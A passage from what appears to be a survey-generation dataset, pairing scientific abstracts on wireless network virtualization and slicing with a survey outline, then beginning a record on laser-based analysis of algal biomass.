virtualization paper_content: The objective of this paper is to survey and compare recent works in the field of wireless virtualization in order to identify potential applications, common trends and future research directions. First, this paper briefly summarizes different wireless virtualization architectures as well as both enabling and enabled technologies related to wireless virtualization. Then, this paper proposes a wireless virtualization classification based on the type of virtualized resources and the depth of slicing. The three main perspectives identified are data and flow-based perspective, protocol-based perspective and spectrum-based perspective. A hypothetical ecosystem scenario of a future virtualized wireless infrastructure in which these perspectives coexist is explored. Finally, the challenges and requirements of a sustainable wireless virtualization framework are discussed. --- paper_title: Future Mobile Communications: Lte Optimization and Mobile Network Virtualization paper_content: The key to a successful future mobile communication system lies in the design of its radio scheduler. One of the key challenges of the radio scheduler is how to provide the right balance between Quality of Service (QoS) guarantees and the overall system performance. Yasir Zaki proposes innovative solutions for the design of the Long Term Evolution (LTE) radio scheduler and presents several LTE radio scheduler analytical models that can be used as efficient tools for radio dimensioning. The author also introduces a novel wireless network virtualization framework and highlights the potential gains of using this framework for the future network operators. This framework enables the operators to share their resources and reduce their cost, thus achieving a better overall system performance and radio resource utilization. --- paper_title: Resource allocation for broadband networks paper_content: The author suggests the use of congestion measures at the packet level, the burst level, and the call level to evaluate congestion for integrated traffic. These measures result from the fact that communication terminals can often be characterized in terms of call level, burst level, and packet level statistics. They can be used for the purpose of bandwidth allocation at these levels, virtually emulating the functions of circuit switching, fast circuit switching, and fast packet switching, respectively. Various methodologies are described for evaluating blocking probabilities at these levels. The analysis sheds light on traffic engineering issues such as appropriate link load, traffic integration, trunk group and switch sizing, and bandwidth reservation criteria for bursty services. > --- paper_title: NVS: A Substrate for Virtualizing Wireless Resources in Cellular Networks paper_content: This paper describes the design and implementation of a network virtualization substrate (NVS ) for effective virtualization of wireless resources in cellular networks. Virtualization fosters the realization of several interesting deployment scenarios such as customized virtual networks, virtual services, and wide-area corporate networks, with diverse performance objectives. In virtualizing a base station's uplink and downlink resources into slices, \ssr NVS meets three key requirements-isolation, customization, and efficient resource utilization-using two novel features: 1) NVS introduces a provably optimal slice scheduler that allows existence of slices with bandwidth-based and resource-based reservations simultaneously; and 2) NVS includes a generic framework for efficiently enabling customized flow scheduling within the base station on a per-slice basis. Through a prototype implementation and detailed evaluation on a WiMAX testbed, we demonstrate the efficacy of \ssr NVS. For instance, we show for both downlink and uplink directions that \ssr NVS can run different flow schedulers in different slices, run different slices simultaneously with different types of reservations, and perform slice-specific application optimizations for providing customized services. --- paper_title: LTE wireless virtualization and spectrum management paper_content: Many research initiatives have started looking into Future Internet solutions in order to satisfy the ever increasing requirements on the Internet and also to cope with the challenges existing in the current one. Some are proposing further enhancements while others are proposing completely new approaches. Network Virtualization is one solution that is able to combine these approaches and therefore, could play a central role in the Future Internet. It will enable the existence of multiple virtual networks on a common infrastructure even with different network architectures. Network Virtualization means setting up a network composed of individual virtualized network components, such as nodes, links, and routers. Mobility will remain a major requirement, which means that also wireless resources need to be virtualized. In this paper the Long Term Evolution (LTE) was chosen as a case study to extend Network Virtualization into the wireless area. --- paper_title: Resource allocation and cross-layer control in wireless networks paper_content: Information flow in a telecommunication network is accomplished through the interaction of mechanisms at various design layers with the end goal of supporting the information exchange needs of the applications. In wireless networks in particular, the different layers interact in a nontrivial manner in order to support information transfer. In this text we will present abstract models that capture the cross-layer interaction from the physical to transport layer in wireless network architectures including cellular, ad-hoc and sensor networks as well as hybrid wireless-wireline. The model allows for arbitrary network topologies as well as traffic forwarding modes, including datagrams and virtual circuits. Furthermore the time varying nature of a wireless network, due either to fading channels or to changing connectivity due to mobility, is adequately captured in our model to allow for state dependent network control policies. Quantitative performance measures that capture the quality of service requirements in these systems depending on the supported applications are discussed, including throughput maximization, energy consumption minimization, rate utility function maximization as well as general performance functionals. Cross-layer control algorithms with optimal or suboptimal performance with respect to the above measures are presented and analyzed. A detailed exposition of the related analysis and design techniques is provided. --- paper_title: LTE Wireless Network Virtualization: Dynamic Slicing via Flexible Scheduling paper_content: The successful virtualization of wireless access networks is strongly affected by the way in which radio resources are managed. The Infrastructure Provider (InP) is required to deploy efficient and flexible scheduling techniques to dynamically allocate the resources for the users associated with different Service Providers (SPs). Service contracts with different SPs and fairness among their users are crucial to the success of the virtualization scheme deployed by the InP. In this paper we develop an efficient resource allocation scheme to allocate the radio resource blocks in LTE networks. The scheme keeps track of the service contracts with the SPs and also the fairness requirements between cell-center users and cell-edge users. Also the scheme allows the flexible definition of fairness requirements for different SPs. The performance of the proposed schemes is evaluated and the results show that the proposed low-complexity scheme is very efficient in terms of computation time and its performance in terms of sum rate is close to the results due to the relaxed solution and coordinate search algorithm. --- paper_title: Investigation of Network Virtualization and Load Balancing Techniques in LTE Networks paper_content: Mobile Network Virtualization (NV) is an emerging technique which has drawn increasingly research attention. Network Virtualization enables multiple network operators to share a common infrastructure (including core network, transport network and access network) so as to reduce the investment capital while improving the overall performance at the same time. This is achieved by exploring the multiplexing gain. Similarly, Load Balancing (LB) is a well-known mechanism used in mobile networks to offload excessive traffic from high-load cells (hot spots) to low-load ones within one network operator. This paper aims at investigating the potential gain of applying NV in LTE (Long Term Evolution) networks and compares it with the LB scheme gain. In this paper, we propose an LTE virtualization framework (that enables spectrum sharing) and a dynamic load balancing scheme for multi-eNB and multi-VO (Virtual Operator) systems. We compare the performance gain of both schemes for different applications, e.g. VoIP, video, HTTP and FTP. We also investigate the parameterization of both schemes, e.g. sharing intervals, LB intervals and safety margins, in order to find the optimal parameter settings. The presented results show that the LTE networks can benefit from both NV and LB techniques. --- paper_title: NVS: A Substrate for Virtualizing Wireless Resources in Cellular Networks paper_content: This paper describes the design and implementation of a network virtualization substrate (NVS ) for effective virtualization of wireless resources in cellular networks. Virtualization fosters the realization of several interesting deployment scenarios such as customized virtual networks, virtual services, and wide-area corporate networks, with diverse performance objectives. In virtualizing a base station's uplink and downlink resources into slices, \ssr NVS meets three key requirements-isolation, customization, and efficient resource utilization-using two novel features: 1) NVS introduces a provably optimal slice scheduler that allows existence of slices with bandwidth-based and resource-based reservations simultaneously; and 2) NVS includes a generic framework for efficiently enabling customized flow scheduling within the base station on a per-slice basis. Through a prototype implementation and detailed evaluation on a WiMAX testbed, we demonstrate the efficacy of \ssr NVS. For instance, we show for both downlink and uplink directions that \ssr NVS can run different flow schedulers in different slices, run different slices simultaneously with different types of reservations, and perform slice-specific application optimizations for providing customized services. --- paper_title: LTE wireless virtualization and spectrum management paper_content: Many research initiatives have started looking into Future Internet solutions in order to satisfy the ever increasing requirements on the Internet and also to cope with the challenges existing in the current one. Some are proposing further enhancements while others are proposing completely new approaches. Network Virtualization is one solution that is able to combine these approaches and therefore, could play a central role in the Future Internet. It will enable the existence of multiple virtual networks on a common infrastructure even with different network architectures. Network Virtualization means setting up a network composed of individual virtualized network components, such as nodes, links, and routers. Mobility will remain a major requirement, which means that also wireless resources need to be virtualized. In this paper the Long Term Evolution (LTE) was chosen as a case study to extend Network Virtualization into the wireless area. --- paper_title: CellSlice: Cellular wireless resource slicing for active RAN sharing paper_content: We present the design and implementation of Cell-Slice, a novel system for slicing wireless resources in a cellular network for effective Radio Access Network (RAN) sharing. CellSlice is a gateway-level solution that achieves the slicing without modifying the basestations' MAC schedulers, thereby significantly reducing the barrier for its adoption. Achieving slicing with a gateway-level solution is challenging, however, since resource scheduling decisions occur at the basestations at fine timescales, and these decisions are not visible at the gateways. In the uplink direction, CellSlice overcomes the challenge by indirectly constraining the uplink scheduler's decisions using a simple feedback-based adaptation algorithm. For downlink, we build on the technique used by NVS, a native basestation virtualization solution, and show that effective downlink slicing can be easily achieved without modifying basestation schedulers. We instantiate a prototype of CellSlice on a Picochip WiMAX testbed. Through both prototype evaluation and simulations, we demonstrate that CellSlice's performance for both remote uplink and remote downlink slicing is close to that of NVS. CellSlice's design is access-technology independent, and hence can be equally applicable to LTE, LTE-Advanced and WiMAX networks. --- paper_title: A Dynamic Embedding Algorithm for Wireless Network Virtualization paper_content: Wireless network virtualization enables multiple virtual wireless networks to coexist on shared physical infrastructure. However, one of the main challenges is the problem of assigning the physical resources to virtual networks in an efficient manner. Although some work has been done on solving the embedding problem for wireless networks, few solutions are applicable to dynamic networks with changing traffic patterns. In this paper we propose a dynamic greedy embedding algorithm for wireless virtualization. Virtual networks can be re-embedded dynamically using this algorithm, enabling increased resource usage and lower rejection rates. We compare the dynamic greedy algorithm to a static embedding algorithm and also to its dynamic version. We show that the dynamic algorithms provide increased performance to previous methods using simulated traffic. In addition we formulate the embedding problem with multiple priority levels for the static and dynamic case. --- paper_title: Virtual basestation: architecture for an open shared WiMAX framework paper_content: This paper presents the architecture and performance evaluation of a virtualized wide-area "4G" cellular wireless network. Specifically, it addresses the challenges of virtualization of resources in a cellular base station to enable shared use by multiple independent slice users (experimenters or mobile virtual network operators), each with possibly distinct flow types and network layer protocols. The proposed virtual basestation architecture is based on an external substrate which uses a layer-2 switched datapath, and an arbitrated control path to the WiMAX basestation. The framework implements virtualization of base station's radio resources to achieve isolation between multiple virtual networks. An algorithm for weighted fair sharing among multiple slices based on an airtime fairness metric has been implemented for the first release. Preliminary experimental results from the virtual basestation prototype are given, demonstrating mobile network performance, isolation across slices with different flow types, and custom flow scheduling capabilities. --- paper_title: Karnaugh-map like online embedding algorithm of wireless virtualization paper_content: Wireless virtualization enables multiple concurrent wireless networks running on a shared wireless substrate to support different services (e.g. multimedia, VoIP). A fundamental challenge in wireless virtualization is how to efficiently assign wireless resource to virtual networks (VNs), i.e. embedding problem. However, so far there are few research results related to the embedding problems of wireless virtualization. This paper focuses on two important goals: (1) the embedding algorithm should handle online virtual network requests; (2) an efficient embedding algorithm is needed. Inspired from karnaugh-map, we present a karnaugh-map-like online embedding algorithm of wireless virtualization, which includes: online scheduling method and karnaugh-map-like embedding algorithm. Evaluation results show that our algorithm has better performance. To the best of authors' knowledge, it is not only the first detailed algorithm on embedding problem of wireless virtualization, but also the first algorithm handling the online requests of wireless virtualization. --- paper_title: VNTS: A Virtual Network Traffic Shaper for Air Time Fairness in 802.16e Systems paper_content: The 802.16e standard for broadband wireless access mandates the presence of QoS classes, but does not specify guidelines for the scheduler implementation or mechanisms to ensure air time fairness. Our study demonstrates the feasibility of controlling downlink airtime fairness for slices while running above a proprietary WiMAX basestation (BS) scheduler. We design and implement a virtualized infrastructure that allows users to obtain at least an allocated percentage of BS resources in the presence of saturation and link degradation. Using Kernel virtual machines for creating slices and Click modular router for implementing the virtual network traffic shaping engine we show that it is possible to adaptively control slice usage for downlink traffic on a WiMAX Basestation. The fairness index and coupling coefficient show an improvement of up to 42%, and 73% with preliminary indoor walking mobility experiments. Outdoor vehicular measurements show an improvement of up to 27%, and 70% with the fairness index and coupling coefficient respectively --- paper_title: CellSlice: Cellular wireless resource slicing for active RAN sharing paper_content: We present the design and implementation of Cell-Slice, a novel system for slicing wireless resources in a cellular network for effective Radio Access Network (RAN) sharing. CellSlice is a gateway-level solution that achieves the slicing without modifying the basestations' MAC schedulers, thereby significantly reducing the barrier for its adoption. Achieving slicing with a gateway-level solution is challenging, however, since resource scheduling decisions occur at the basestations at fine timescales, and these decisions are not visible at the gateways. In the uplink direction, CellSlice overcomes the challenge by indirectly constraining the uplink scheduler's decisions using a simple feedback-based adaptation algorithm. For downlink, we build on the technique used by NVS, a native basestation virtualization solution, and show that effective downlink slicing can be easily achieved without modifying basestation schedulers. We instantiate a prototype of CellSlice on a Picochip WiMAX testbed. Through both prototype evaluation and simulations, we demonstrate that CellSlice's performance for both remote uplink and remote downlink slicing is close to that of NVS. CellSlice's design is access-technology independent, and hence can be equally applicable to LTE, LTE-Advanced and WiMAX networks. --- paper_title: ViFi: Virtualizing WLAN using Commodity Hardware paper_content: We consider an architecture in which the same WiFi infrastructure can be dynamically shared among multiple operators. Our system, ViFi, virtualizes WLAN resources, allowing for controlled sharing of both the uplink and downlink bandwidth. ViFi operates with stock 802.11 clients, and can be implemented entirely as a software add-on for commodity 802.11 APs. ViFi puts users (customers) of different operators in separate groups, each creating a virtual WLAN. ViFi guarantees proportional fair share of channel access time at group level, and isolates traffic between groups. The key technical contribution of ViFi is a useful form of virtualization without requiring changes to the underlying WiFi protocol. --- paper_title: Virtualization of Multi-Cell 802.11 Networks: Association and Airtime Control paper_content: This paper investigates the virtualization and optimization of a multi-cell WLAN. We consider the station (STA)-access point (AP) association and airtime control for virtualized 802.11 networks to provide service customization and fairness across multiple internet service providers (ISPs) sharing the common physical infrastructure and network capacity. More specifically, an optimization problem is formulated on the STAs transmission probabilities to maximize the overall network throughput, while providing airtime usage guarantees for the ISPs. Subsequently, an algorithm to reach the optimal solution is developed by applying monomial approximation and geometric programming iteratively. Based on the proposed three-dimensional Markov-chain model of the enhanced distributed channel access (EDCA) protocol, the detailed implementation of the optimal transmission probability is also discussed. The accuracy of the proposed Markov-chain model and the performance of the developed association and airtime control scheme are evaluated through numerical results. --- paper_title: Wireless virtualization on commodity 802.11 hardware paper_content: In this paper we describe specific challenges in virtualizing a wireless network and multiple strategies to address them. Among different possible wireless virtualization strategies, our current work in this domain is focussed on a Time-Division Multiplexing (TDM) approach. Hence, we we present our experiences in the design and implementation of such TDM-based wireless virtualization. Our wireless virtualization system is specifically targeted for multiplexing experiments on a large-scale 802.11 wireless testbed facility. --- paper_title: Providing Throughput and Fairness Guarantees in Virtualized WLANs through Control Theory paper_content: With the increasing demand for mobile Internet access, WLAN virtualization is becoming a promising solution for sharing wireless infrastructure among multiple service providers. Unfortunately, few mechanisms have been devised to tackle this problem and the existing approaches fail in optimizing the limited bandwidth and providing virtual networks with fairness guarantees. In this paper, we propose a novel algorithm based on control theory to configure the virtual WLANs with the goal of ensuring fairness in the resource distribution, while maximizing the total throughput. Our algorithm works by adapting the contention window configuration of each virtual WLAN to the channel activity in order to ensure optimal operation. We conduct a control-theoretic analysis of our system to appropriately design the parameters of the controller and prove system stability, and undertake an extensive simulation study to show that our proposal optimizes performance under different types of traffic. The results show that the mechanism provides a fair resource distribution independent of the number of stations and their level of activity, and is able to react promptly to changes in the network conditions while ensuring stable operation. --- paper_title: Airtime-based resource control in wireless LANs for wireless network virtualization paper_content: Wireless network virtualization is needed to build a virtual network over wireless and wired networks, which enables a rapid deployment of novel mobile services or novel mobile network architectures on a shared infrastructure. This paper proposes an airtime-based resource control technique for wireless network virtualization, in which wireless network resources are allocated among competing virtual networks while keeping their programmability. A WLAN system adopting the proposed technique is developed by enhancing an IEEE 802.11e EDCA (Enhanced Distributed Channel Access) MAC (Media Access Control) mechanism. The operation of the resource control technique is demonstrated by a simulation and the performance of airtime usage and throughput are investigated. It is shown that technique can successfully control the wireless network resource allocations with a target ratio even under conditions when the WLAN system suffers interferences. --- paper_title: SplitAP: Leveraging Wireless Network Virtualization for Flexible Sharing of WLANs paper_content: Providing air-time guarantees across a group of clients forms a fundamental building block in sharing an access point (AP) across different virtual network providers. Though this problem has a relatively simple solution for downlink group scheduling through traffic engineering at the AP, solving this problem for uplink (UL) traffic presents a challenge for fair sharing of wireless hotspots. Among other issues, the mechanism for uplink traffic control has to scale across a large user base, and provide flexible operation irrespective of the client channel conditions and network loads. In this study, we propose the SplitAP architecture that address the problem of sharing uplink airtime across groups of users by extending the idea of network virtualization. Our architecture allows us to deploy different algorithms for enforcing UL airtime fairness across client groups. In this study, we will highlight the design features of the SplitAP architecture, and present results from evaluation on a prototype deployed with: (1) LPFC and (2) LPFC+, two algorithms for controlling UL group fairness. Performance comparisons on the ORBIT testbed show that the proposed algorithms are capable of providing group air-time fairness across wireless clients irrespective of the network volume, and traffic type. The algorithms show up to 40% improvement with a modified Jain fairness index. --- paper_title: Space Versus Time Separation for Wireless Virtualization on an Indoor Grid paper_content: The decreasing cost of wireless hardware and ever increasing number of wireless testbeds has led to a shift in the protocol evaluation paradigm from simulations towards emulation. In addition, with a large number of users demanding experimental resources and lack of space and time for deploying more hardware, fair resource sharing among independent co-existing experiments is important. We study the proposed approaches to wireless virtualization with a focus on schemes conserving wireless channels rather than nodes. Our detailed comparison reveals that while experiments sharing a channel by space separation achieve better efficiency than those relying on time separation of a channel, the isolation between experiments in both cases is comparable. We propose and implement a policy manager to alleviate the isolation problem and suggest scenarios in which either of the schemes would provide a suitable virtualization solution. --- paper_title: Virtual WiFi: bring virtualization from wired to wireless paper_content: As virtualization trend is moving towards "client virtualization", wireless virtualization remains to be one of the technology gaps that haven't been addressed satisfactorily. Today's approaches are mainly developed for wired network, and are not suitable for virtualizing wireless network interface due to the fundamental differences between wireless and wired LAN devices that we will elaborate in this paper. We propose a wireless LAN virtualization approach named virtual WiFi that addresses the technology gap. With our proposed solution, the full wireless LAN functionalities are supported inside virtual machines; each virtual machine can establish its own connection with self-supplied credentials; and multiple separate wireless LAN connections are supported through one physical wireless LAN network interface. We designed and implemented a prototype for our proposed virtual WiFi approach, and conducted detailed performance study. Our results show that with conventional virtualization overhead mitigation mechanisms, our proposed approach can support fully functional wireless functions inside VM, and achieve close to native performance of Wireless LAN with moderately increased CPU utilization. --- paper_title: Supporting Integrated MAC and PHY Software Development for the USRP SDR paper_content: Software Defined Radios (SDR) offer great runtime flexibility both at the physical and MAC layer. This makes them an attractive platform for the development of cognitive radios that can adapt to changes in channel conditions, traffic load, and user requirements. However, to realize this goal, we need a software framework that supports both MAC protocol and PHY layer development in an integrated fashion. In this paper we report on our experience in using two different software frameworks for integrated PHY-MAC development for SDRs: GNU Radio, which was originally designed to support PHY layer development, and Click, a framework for protocol development. We also discuss a number of broader system considerations, such as what functionality should be offloaded to the SDR device. --- paper_title: Building Programmable Wireless Networks: An Architectural Survey paper_content: In recent times, there is increasing consensus that the traditional Internet architecture needs to be evolved for it to sustain unstinted growth and innovation. A major reason for the perceived architectural ossification is the lack of the ability to program the network as a system. This situation has resulted partly from historical decisions in the original Internet design which emphasized decentralized network operations through colocated data and control planes on each network device. The situation for wireless networks is no different resulting in a lot of complexity and a plethora of largely incompatible wireless technologies. With traditional architectures providing limited support for programmability, there is a broad realization in the wireless community that future programmable wireless networks would require significant architectural innovations. In this paper, we will present an unified overview of the programmability solutions that have been proposed at the device and the network level. In particular, we will discuss software-defined radio (SDR), cognitive radio (CR), programmable MAC processor, and programmable routers as device-level programmability solutions, and software-defined networking (SDN), cognitive wireless networking (CWN), virtualizable wireless networking (VWN) and cloud-based wireless networking (CbWN) as network-level programmability solutions. We provide both a self-contained exposition of these topics as well as a broad survey of the application of these trends in modern wireless networks. --- paper_title: TAISC: A cross-platform MAC protocol compiler and execution engine paper_content: Abstract MAC protocols significantly impact wireless performance metrics such as throughput, energy consumption and reliability. Although the choice of the optimal MAC protocol depends on time-varying criteria such as the current application requirements and the current environmental conditions, MAC protocols cannot be upgraded after deployment since their implementations are typically written in low level, hardware specific code which is hard to reuse on other hardware platforms. To remedy this shortcoming, this paper introduces TAISC, Time Annotated Instruction Set Computer, a framework for hardware independent MAC protocol development and management. The solution presented in this paper allows describing MAC protocols in a platform independent language, followed by a straightforward compilation step, yielding dedicated binary code, optimized for specific radio chips. The compiled code is as efficient in terms of memory footprint as custom-written protocols for specific devices. To enable time-critical operation, the TAISC compiler adds exact time annotations to every instruction of the optimized binary code. As a result, the TAISC approach can be used for energy-efficient cross-platform MAC protocol design, while achieving up to 97% of the theoretical throughput at an overhead of only 20 µs per instruction. --- paper_title: OpenRadio: a programmable wireless dataplane paper_content: We present OpenRadio, a novel design for a programmable wireless dataplane that provides modular and declarative programming interfaces across the entire wireless stack. Our key conceptual contribution is a principled refactoring of wireless protocols into processing and decision planes. The processing plane includes directed graphs of algorithmic actions (eg. 54Mbps OFDM WiFi or special encoding for video). The decision plane contains the logic which dictates which directed graph is used for a particular packet (eg. picking between data and video graphs). The decoupling provides a declarative interface to program the platform while hiding all underlying complexity of execution. An operator only expresses decision plane rules and corresponding processing plane action graphs to assemble a protocol. The scoped interface allows us to build a dataplane that arguably provides the right tradeoff between performance and flexibility. Our current system is capable of realizing modern wireless protocols (WiFi, LTE) on off-the-shelf DSP chips while providing flexibility to modify the PHY and MAC layers to implement protocol optimizations. --- paper_title: Current trends and perspectives in wireless virtualization paper_content: The objective of this paper is to survey and compare recent works in the field of wireless virtualization in order to identify potential applications, common trends and future research directions. First, this paper briefly summarizes different wireless virtualization architectures as well as both enabling and enabled technologies related to wireless virtualization. Then, this paper proposes a wireless virtualization classification based on the type of virtualized resources and the depth of slicing. The three main perspectives identified are data and flow-based perspective, protocol-based perspective and spectrum-based perspective. A hypothetical ecosystem scenario of a future virtualized wireless infrastructure in which these perspectives coexist is explored. Finally, the challenges and requirements of a sustainable wireless virtualization framework are discussed. --- paper_title: Wireless network virtualization paper_content: Virtualization of wired networks and end computing systems has become one of the leading trends in networked ICT systems. In contrast relatively little virtualization has occurred in infrastructure based wireless networks, but the idea of virtualizing wireless access is gaining attention as it has the potential to improve spectrum utilization and perhaps create new services. In this paper we survey the state of the current research in virtualizing wireless networks. We define and describe possible architectures, the issues, hurdles and trends towards implementation of wireless network virtualization. --- paper_title: Towards a scalable and near-sighted control plane architecture for WiFi SDNs paper_content: Not much is known today about how to reap the SDN benefits in WiFi networks-a critical use case given the increasing importance of WiFi networks. This paper presents AeroFlux, a scalable software-defined wireless network, that supports large enterprise and carrier WiFi deployments with low-latency programmatic control of fine-grained WiFi-specific transmission settings. This is achieved through AeroFlux's hierarchical design. We report on an early prototype implementation and evaluation, showing that AeroFlux can significantly reduce control plane traffic. --- paper_title: SoftRAN: software defined radio access network paper_content: An important piece of the cellular network infrastructure is the radio access network (RAN) that provides wide-area wireless connectivity to mobile devices. The fundamental problem the RAN solves is figuring out how best to use and manage limited spectrum to achieve this connectivity. In a dense wireless deployment with mobile nodes and limited spectrum, it becomes a difficult task to allocate radio resources, implement handovers, manage interference, balance load between cells, etc. We argue that LTE's current distributed control plane is suboptimal in achieving the above objective. We propose SoftRAN, a fundamental rethink of the radio access layer. SoftRAN is a software defined centralized control plane for radio access networks that abstracts all base stations in a local geographical area as a virtual big-base station comprised of a central controller and radio elements (individual physical base stations). In defining such an architecture, we create a framework through which a local geographical network can effectively perform load balancing and interference management, as well as maximize throughput, global utility, or any other objective. ---
Title: Resource Slicing in Virtual Wireless Networks: A Survey Section 1: INTRODUCTION Description 1: Introduce the major concerns of wireless networks, the concept of Wireless Network Virtualization (WNV), and outline the focus of the survey on wireless resource slicing, its challenges, and existing techniques. Section 2: RELATED CONCEPTS Description 2: Describe three enablers of wireless slicing: Wireless Network Virtualization (WNV), Software Defined Networking (SDN), and Network Function Virtualization (NFV), and review existing works on these topics. Section 3: Wireless Network Virtualization Description 3: Detail the concept, goals, and challenges of Wireless Network Virtualization (WNV) as an enabler for slicing wireless networks. Section 4: Software Defined Networking Description 4: Explain the concept of SDN, its implications for wireless slicing, and review relevant literature on SDN tools and frameworks. Section 5: Network Function Virtualization Description 5: Describe NFV, its role as an enabler for wireless slicing, and review pertinent research efforts. Section 6: THE SLICING APPROACH Description 6: Define the concept of slicing in network virtualization and introduce the motivations for slicing a wireless network. Section 7: PROBLEM DESCRIPTION Description 7: Identify and detail the problems of resource allocation and isolation in wireless slicing, including a brief introduction to medium access techniques. Section 8: Medium Access Techniques Description 8: Provide an overview of medium access control methods in LTE and IEEE 802.11 standards to contextualize the challenges in wireless slicing. Section 9: Resource Allocation Description 9: Discuss the complexities of assigning resources to different slices in wireless networks, including potential models and mechanisms for resource allocation. Section 10: Isolation Description 10: Discuss the isolation problem in wireless slicing, highlighting the challenges of maintaining slice specifications over time. Section 11: EXISTING APPROACHES FOR WIRELESS SLICING Description 11: Review existing mechanisms proposed for wireless slicing, focusing on solutions for LTE, WiMAX, and IEEE 802.11 technologies. Section 12: Research Challenges Description 12: Explore the remaining challenges and open research directions in wireless resource slicing, such as isolation in random access networks, technology-agnostic solutions, dynamics, time constraints, real deployments, user mobility, and more. Section 13: CONCLUSION Description 13: Summarize the survey, highlighting the integral role of slicing in wireless network virtualization and the challenges that remain to be addressed.
Algal Biomass Analysis by Laser-Based Analytical Techniques—A Review
9
--- paper_title: High-resolution analysis of trace elements in crustose coralline algae from the North Atlantic and North Pacific by laser ablation ICP-MS paper_content: We have investigated the trace elemental composition in the skeleta of two specimens of attached-living ::: coralline algae of the species Clathromorphum compactum from the North Atlantic (Newfoundland) and ::: Clathromorphum nereostratum from the North Pacific/Bering Sea region (Amchitka Island, Aleutians). ::: Samples were analyzed using Laser Ablation-Inductively Coupled Plasma Mass Spectrometry (LA-ICP-MS) ::: yielding for the first time continuous individual trace elemental records of up to 69 years in length. The ::: resulting algal Mg/Ca, Sr/Ca, U/Ca, and Ba/Ca ratios are reproducible within individual sample specimens. ::: Algal Mg/Ca ratios were additionally validated by electron microprobe analyses (Amchitka sample). Algal Sr/ ::: Ca, U/Ca, and Ba/Ca ratios were compared to algal Mg/Ca ratios, which previously have been shown to ::: reliably record sea surface temperature (SST). Ratios of Sr/Ca from both Clathromorphum species show a ::: strong positive correlation to temperature-dependent Mg/Ca ratios, implying that seawater temperature ::: plays an important role in the incorporation of Sr into algal calcite. Linear Sr/Ca-SST regressions have ::: provided positive, but weaker relationships as compared to Mg/Ca-SST relationships. Both, algal Mg/Ca and ::: Sr/Ca display clear seasonal cycles. Inverse correlations were found between algal Mg/Ca and U/Ca, Ba/Ca, ::: and correlations to SST are weaker than between Mg/Ca, Sr/Ca and SST. This suggests that the incorporation ::: of U and Ba is influenced by other factors aside from temperature --- paper_title: Production and harvesting of microalgae for wastewater treatment, biofuels, and bioproducts. paper_content: The integration of microalgae-based biofuel and bioproducts production with wastewater treatment has major advantages for both industries. However, major challenges to the implementation of an integrated system include the large-scale production of algae and the harvesting of microalgae in a way that allows for downstream processing to produce biofuels and other bioproducts of value. Although the majority of algal production systems use suspended cultures in either open ponds or closed reactors, the use of attached cultures may offer several advantages. With regard to harvesting methods, better understanding and control of autoflocculation and bioflocculation could improve performance and reduce chemical addition requirements for conventional mechanical methods that include centrifugation, tangential filtration, gravity sedimentation, and dissolved air flotation. There are many approaches currently used by companies and industries using clean water at laboratory, bench, and pilot scale; however, large-scale systems for controlled algae production and/or harvesting for wastewater treatment and subsequent processing for bioproducts are lacking. Further investigation and development of large-scale production and harvesting methods for biofuels and bioproducts are necessary, particularly with less studied but promising approaches such as those involving attached algal biofilm cultures. --- paper_title: Triacylglycerol profiling of marine microalgae by mass spectrometry. paper_content: We present a method for the determination of triacylglycerol (TAG) profiles of oleaginous saltwater microalgae relevant for the production of biofuels, bioactive lipids, and high-value lipid-based chemical precursors. We describe a technique to remove chlorophyll using quick, simple solid phase extraction (SPE) and directly compare the intact TAG composition of four microalgae species (Phaeodactylum tricornutum, Nannochloropsis salina, Nannochloropsis oculata, and Tetraselmis suecica) using MALDI time-of-flight (TOF) mass spectrometry (MS), ESI linear ion trap-orbitrap (LTQ Orbitrap) MS, and ¹H NMR spectroscopy. Direct MS analysis is particularly effective to compare the polyunsaturated fatty acid (PUFA) composition for triacylglycerols because oxidation can often degrade samples upon derivatization. Using these methods, we observed that T. suecica contains significant PUFA levels with respect to other microalgae. This method is applicable for high-throughput MS screening of microalgae TAG profiles and may aid in the commercial development of biofuels. --- paper_title: Freshening of the Alaska Coastal Current recorded by coralline algal Ba/Ca ratios paper_content: Arctic Ocean freshening can exert a controlling influence on global climate, triggering ::: strong feedbacks on ocean‐atmospheric processes and affecting the global cycling of the ::: world’s oceans. Glacier‐fed ocean currents such as the Alaska Coastal Current are ::: important sources of freshwater for the Bering Sea shelf, and may also influence the Arctic ::: Ocean freshwater budget. Instrumental data indicate a multiyear freshening episode of ::: the Alaska Coastal Current in the early 21st century. It is uncertain whether this freshening ::: is part of natural multidecadal climate variability or a unique feature of anthropogenically ::: induced warming. In order to answer this, a better understanding of past variations in ::: the Alaska Coastal Current is needed. However, continuous long‐term high‐resolution ::: observations of the Alaska Coastal Current have only been available for the last 2 decades. ::: In this study, specimens of the long‐lived crustose coralline alga Clathromorphum ::: nereostratum were collected within the pathway of the Alaska Coastal Current and utilized ::: as archives of past temperature and salinity. Results indicate that coralline algal Mg/Ca ::: ratios provide a 60 year record of sea surface temperatures and track changes of the Pacific ::: Decadal Oscillation, a pattern of decadal‐to‐multidecadal ocean‐atmosphere climate ::: variability centered over the North Pacific. Algal Ba/Ca ratios (used as indicators of coastal ::: freshwater runoff) are inversely correlated to instrumentally measured Alaska Coastal ::: Current salinity and record the period of freshening from 2001 to 2006. Similar multiyear ::: freshening events are not evident in the earlier portion of the 60 year Ba/Ca record. ::: This suggests that the 21st century freshening of the Alaska Coastal Current is a unique ::: feature related to increasing glacial melt and precipitation on mainland Alaska. --- paper_title: Application of laser-induced breakdown spectroscopy to the analysis of algal biomass for industrial biotechnology paper_content: Abstract We report on the application of laser-induced breakdown spectroscopy (LIBS) to the determination of elements distinctive in terms of their biological significance (such as potassium, magnesium, calcium, and sodium) and to the monitoring of accumulation of potentially toxic heavy metal ions in living microorganisms (algae), in order to trace e.g. the influence of environmental exposure and other cultivation and biological factors having an impact on them. Algae cells were suspended in liquid media or presented in a form of adherent cell mass on a surface (biofilm) and, consequently, characterized using their spectra. In our feasibility study we used three different experimental arrangements employing double-pulse LIBS technique in order to improve on analytical selectivity and sensitivity for potential industrial biotechnology applications, e.g. for monitoring of mass production of commercial biofuels, utilization in the food industry and control of the removal of heavy metal ions from industrial waste waters. --- paper_title: MALDI-typing of infectious algae of the genus Prototheca using SOM portraits. paper_content: BACKGROUND ::: MALDI-typing has become a frequently used approach for the identification of microorganisms and recently also of invertebrates. Similarity-comparisons are usually based on single-spectral data. We apply self-organizing maps (SOM) to portray the MS-spectral data with individual resolution and to improve the typing of Prototheca algae by using meta-spectra representing prototypes of groups of similar-behaving single spectra. ::: ::: ::: RESULTS ::: The MALDI-TOF peaklists of more than 300 algae extracts referring to five Prototheca species were transformed into colored mosaic images serving as molecular portraits of the individual samples. The portraits visualize the 